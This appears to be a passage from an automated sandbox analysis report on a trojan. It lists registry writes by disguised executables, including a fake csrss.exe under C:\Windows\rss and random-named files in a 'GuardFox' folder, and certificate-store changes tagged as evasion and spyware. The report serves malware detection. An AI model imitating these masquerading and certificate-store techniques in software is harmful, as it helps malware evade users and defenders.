Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-472 = "Ekaterinburg Standard Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-581 = "North Asia East Daylight Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-421 = "Russian Daylight Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client" C:\Windows\system32\netsh.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-502 = "Nepal Standard Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-551 = "North Asia Daylight Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-422 = "Russian Standard Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec529030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47409000000010000000c000000300a06082b060105050703011d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c00b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f00740000000f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Windows\rss\csrss.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e40f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47419000000010000001000000068cb42b035ea773e52ef50ecf50ec52920000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Windows\rss\csrss.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993a